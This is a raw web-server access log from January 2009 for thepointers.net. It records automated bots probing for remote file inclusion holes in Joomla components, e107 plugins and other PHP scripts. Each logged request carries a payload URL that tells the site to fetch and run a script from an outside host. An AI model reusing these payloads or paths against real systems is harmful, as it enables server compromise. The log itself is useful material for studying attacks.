194.135.103.242 - - [06/Jan/2009:05:28:40 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.thepointers.net"
64.118.85.149 - - [06/Jan/2009:05:28:54 -0800] "GET /logs/access_081002.log%20/index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
86.109.170.176 - - [06/Jan/2009:05:30:21 -0800] "GET /logs/access_081016.log/admin.lib.inc.php?site_path=http://turkglob.tu.funpic.org/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
86.109.170.176 - - [06/Jan/2009:05:30:21 -0800] "GET /logs/admin.lib.inc.php?site_path=http://turkglob.tu.funpic.org/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
86.109.170.176 - - [06/Jan/2009:05:30:21 -0800] "GET /admin.lib.inc.php?site_path=http://turkglob.tu.funpic.org/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
69.94.66.139 - - [06/Jan/2009:05:30:23 -0800] "GET /logs/access_081208.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
69.94.66.139 - - [06/Jan/2009:05:30:23 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
69.94.66.139 - - [06/Jan/2009:05:30:23 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
72.52.215.115 - - [06/Jan/2009:05:30:55 -0800] "GET /logs/access_081002.log%20/index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.thepointers.net"
69.94.66.139 - - [06/Jan/2009:05:31:22 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
213.226.166.122 - - [06/Jan/2009:05:32:24 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.thepointers.net"
81.208.9.229 - - [06/Jan/2009:05:32:55 -0800] "GET /?page=http://www.recantodossabidinhos.com.br//imagens/ctrl.txt????%0D?? HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "www.thepointers.net"
81.208.9.229 - - [06/Jan/2009:05:32:55 -0800] "GET /logs//?page=http://www.recantodossabidinhos.com.br//imagens/ctrl.txt????%0D?? HTTP/1.1" 200 2373 "-" "libwww-perl/5.803" "www.thepointers.net"
81.208.9.229 - - [06/Jan/2009:05:32:56 -0800] "GET /logs/access_081206.log//?page=http://www.recantodossabidinhos.com.br//imagens/ctrl.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.thepointers.net"
69.94.66.139 - - [06/Jan/2009:05:33:21 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "thepointers.net"
213.226.166.122 - - [06/Jan/2009:05:33:23 -0800] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "thepointers.net"
213.226.166.122 - - [06/Jan/2009:05:33:24 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "thepointers.net"
213.226.166.122 - - [06/Jan/2009:05:33:29 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "thepointers.net"
80.122.203.139 - - [06/Jan/2009:05:33:56 -0800] "GET /templates/mangobery/footer.sample.php?Site_Path=http://www.recantodossabidinhos.com.br//imagens/ctrl.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
80.122.203.139 - - [06/Jan/2009:05:33:56 -0800] "GET /logs/access_081206.log//templates/mangobery/footer.sample.php?Site_Path=http://www.recantodossabidinhos.com.br//imagens/ctrl.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
80.122.203.139 - - [06/Jan/2009:05:33:56 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.recantodossabidinhos.com.br//imagens/ctrl.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
91.142.214.201 - - [06/Jan/2009:05:34:51 -0800] "GET /logs/access.log//inc/header.php/step_one.php?server_inc=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "thepointers.net"
91.142.214.201 - - [06/Jan/2009:05:34:51 -0800] "GET /inc/header.php/step_one.php?server_inc=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "thepointers.net"
91.142.214.201 - - [06/Jan/2009:05:34:51 -0800] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "thepointers.net"
91.142.214.201 - - [06/Jan/2009:05:34:52 -0800] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.thepointers.net"
91.142.214.201 - - [06/Jan/2009:05:34:52 -0800] "GET /inc/header.php/step_one.php?server_inc=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.thepointers.net"
91.142.214.201 - - [06/Jan/2009:05:34:52 -0800] "GET /logs/access_081208.log//inc/header.php/step_one.php?server_inc=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.thepointers.net"
81.208.9.229 - - [06/Jan/2009:05:35:01 -0800] "GET /logs/access_081005.log//?page=http://www.recantodossabidinhos.com.br//imagens/ctrl.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.thepointers.net"
80.122.203.139 - - [06/Jan/2009:05:36:14 -0800] "GET /logs/access_081005.log//templates/mangobery/footer.sample.php?Site_Path=http://www.recantodossabidinhos.com.br//imagens/ctrl.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
222.236.47.182 - - [06/Jan/2009:05:36:16 -0800] "GET /logs/path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "thepointers.net"
222.236.47.182 - - [06/Jan/2009:05:36:16 -0800] "GET /logs/access.log/path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "thepointers.net"
222.236.47.182 - - [06/Jan/2009:05:36:17 -0800] "GET /path/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "thepointers.net"
86.109.170.176 - - [06/Jan/2009:05:36:19 -0800] "GET /index.php?sayfa=http://turkglob.tu.funpic.org/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
86.109.170.176 - - [06/Jan/2009:05:36:19 -0800] "GET /logs/access.log/index.php?sayfa=http://turkglob.tu.funpic.org/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
86.109.170.176 - - [06/Jan/2009:05:36:19 -0800] "GET /logs/index.php?sayfa=http://turkglob.tu.funpic.org/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
213.226.166.122 - - [06/Jan/2009:05:37:07 -0800] "GET /logs/access_081206.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.thepointers.net"
213.226.166.122 - - [06/Jan/2009:05:37:13 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.thepointers.net"
213.226.166.122 - - [06/Jan/2009:05:37:17 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.thepointers.net"
213.226.166.122 - - [06/Jan/2009:05:39:28 -0800] "GET /logs/access_081205.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.thepointers.net"
218.232.109.160 - - [06/Jan/2009:05:39:32 -0800] "GET /logs/access_081206.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fni.it/assets/js/errors.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
218.232.109.160 - - [06/Jan/2009:05:39:32 -0800] "GET /logs/access_081206.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fni.it/assets/js/errors.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
213.226.166.122 - - [06/Jan/2009:05:39:33 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.thepointers.net"
218.232.109.160 - - [06/Jan/2009:05:39:33 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fni.it/assets/js/errors.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
218.232.109.160 - - [06/Jan/2009:05:39:33 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fni.it/assets/js/errors.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
213.226.166.122 - - [06/Jan/2009:05:39:33 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.thepointers.net"
218.232.109.160 - - [06/Jan/2009:05:39:34 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fni.it/assets/js/errors.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
218.232.109.160 - - [06/Jan/2009:05:39:34 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fni.it/assets/js/errors.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
218.232.109.160 - - [06/Jan/2009:05:40:27 -0800] "GET /logs/access_081206.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://flowskatepark.org/WebCalendar-1.0.4//includes/compress.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.thepointers.net"
218.232.109.160 - - [06/Jan/2009:05:40:27 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://flowskatepark.org/WebCalendar-1.0.4//includes/compress.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.thepointers.net"
218.232.109.160 - - [06/Jan/2009:05:40:27 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://flowskatepark.org/WebCalendar-1.0.4//includes/compress.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.thepointers.net"
85.214.53.78 - - [06/Jan/2009:05:41:27 -0800] "GET /logs/access_081206.log//errors.php?error=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.thepointers.net"
85.214.53.78 - - [06/Jan/2009:05:41:27 -0800] "GET /errors.php?error=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.thepointers.net"
85.214.53.78 - - [06/Jan/2009:05:41:28 -0800] "GET /logs//errors.php?error=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.thepointers.net"
218.232.109.160 - - [06/Jan/2009:05:41:53 -0800] "GET /logs/access_081208.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://flowskatepark.org/WebCalendar-1.0.4//includes/compress.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.thepointers.net"
85.214.79.241 - - [06/Jan/2009:05:41:57 -0800] "GET /logs/e107_plugins/my_gallery/dload.php?file=http://demod.net/test/data/abcd/iblissnet/tux/gore/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
85.214.79.241 - - [06/Jan/2009:05:41:57 -0800] "GET /e107_plugins/my_gallery/dload.php?file=http://demod.net/test/data/abcd/iblissnet/tux/gore/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
85.214.79.241 - - [06/Jan/2009:05:41:57 -0800] "GET /logs/access_080930.log%20%20/e107_plugins/my_gallery/dload.php?file=http://demod.net/test/data/abcd/iblissnet/tux/gore/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
89.36.165.22 - - [06/Jan/2009:05:42:38 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "thepointers.net"
89.36.165.22 - - [06/Jan/2009:05:42:38 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "thepointers.net"
89.36.165.22 - - [06/Jan/2009:05:42:38 -0800] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "thepointers.net"
211.202.2.220 - - [06/Jan/2009:05:42:43 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
211.202.2.220 - - [06/Jan/2009:05:42:43 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
211.202.2.220 - - [06/Jan/2009:05:42:43 -0800] "GET /logs/access_081205.log%20%20/joomla/index.php?option=com_restaurante&task=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
91.196.124.13 - - [06/Jan/2009:05:42:54 -0800] "GET /logs/e107_plugins/my_gallery/dload.php?file=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.thepointers.net"
91.196.124.13 - - [06/Jan/2009:05:42:54 -0800] "GET /logs/access_080930.log/e107_plugins/my_gallery/dload.php?file=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.thepointers.net"
91.196.124.13 - - [06/Jan/2009:05:42:54 -0800] "GET /e107_plugins/my_gallery/dload.php?file=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.thepointers.net"
211.202.2.220 - - [06/Jan/2009:05:42:57 -0800] "GET /logs/access_081205.log%20%20/joomla/index.php?option=com_restaurante&task=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
211.202.2.220 - - [06/Jan/2009:05:42:58 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
211.202.2.220 - - [06/Jan/2009:05:42:58 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
85.214.79.241 - - [06/Jan/2009:05:43:24 -0800] "GET /logs/access_080927.log%20%20/e107_plugins/my_gallery/dload.php?file=http://demod.net/test/data/abcd/iblissnet/tux/gore/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
200.49.188.178 - - [06/Jan/2009:05:43:39 -0800] "GET /logs/access.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.thepointers.net"
91.196.124.13 - - [06/Jan/2009:05:43:55 -0800] "GET /logs/access_080927.log/e107_plugins/my_gallery/dload.php?file=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.thepointers.net"
211.202.2.220 - - [06/Jan/2009:05:43:56 -0800] "GET /logs/access_081002.log%20%20/joomla/index.php?option=com_restaurante&task=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
211.202.2.220 - - [06/Jan/2009:05:44:12 -0800] "GET /logs/access_081002.log%20%20/joomla/index.php?option=com_restaurante&task=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
91.142.214.201 - - [06/Jan/2009:05:45:30 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "thepointers.net"
91.142.214.201 - - [06/Jan/2009:05:45:30 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "thepointers.net"
91.142.214.201 - - [06/Jan/2009:05:45:30 -0800] "GET /logs/access.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "thepointers.net"
91.196.124.13 - - [06/Jan/2009:05:47:32 -0800] "GET /logs/access.log/e107_plugins/my_gallery/dload.php?file=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.thepointers.net"
91.142.214.201 - - [06/Jan/2009:05:48:01 -0800] "GET /logs/access_081208.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.thepointers.net"
91.142.214.201 - - [06/Jan/2009:05:48:01 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.thepointers.net"
91.142.214.201 - - [06/Jan/2009:05:48:01 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.chili-dragrace.com/images/saves.png??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.thepointers.net"
89.36.165.22 - - [06/Jan/2009:05:51:28 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "thepointers.net"
89.36.165.22 - - [06/Jan/2009:05:51:28 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "thepointers.net"
89.36.165.22 - - [06/Jan/2009:05:51:28 -0800] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "thepointers.net"
89.36.165.22 - - [06/Jan/2009:05:51:29 -0800] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "thepointers.net"
89.36.165.22 - - [06/Jan/2009:05:51:29 -0800] "GET /admin/business_inc/saveserver.php?thisdir=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "thepointers.net"
89.36.165.22 - - [06/Jan/2009:05:51:29 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "thepointers.net"
85.214.53.78 - - [06/Jan/2009:05:51:32 -0800] "GET /logs/access_081208.log//errors.php?error=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.thepointers.net"
211.202.2.220 - - [06/Jan/2009:05:52:44 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
211.202.2.220 - - [06/Jan/2009:05:52:44 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
211.202.2.220 - - [06/Jan/2009:05:52:44 -0800] "GET /logs/access_081205.log%20%20/joomla/index.php?option=com_restaurante&task=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
72.52.215.115 - - [06/Jan/2009:05:52:47 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.thepointers.net"
72.52.215.115 - - [06/Jan/2009:05:52:47 -0800] "GET /logs/index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.thepointers.net"
72.52.215.115 - - [06/Jan/2009:05:52:47 -0800] "GET /logs/access_081206.log/index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.thepointers.net"
211.202.2.220 - - [06/Jan/2009:05:53:01 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
211.202.2.220 - - [06/Jan/2009:05:53:01 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
211.202.2.220 - - [06/Jan/2009:05:53:01 -0800] "GET /logs/access_081205.log%20%20/joomla/index.php?option=com_restaurante&task=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.thepointers.net"
69.94.66.139 - - [06/Jan/2009:05:53:37 -0800] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "thepointers.net"
69.94.66.139 - - [06/Jan/2009:05:53:37 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "thepointers.net"
69.94.66.139 - - [06/Jan/2009:05:53:37 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "thepointers.net"
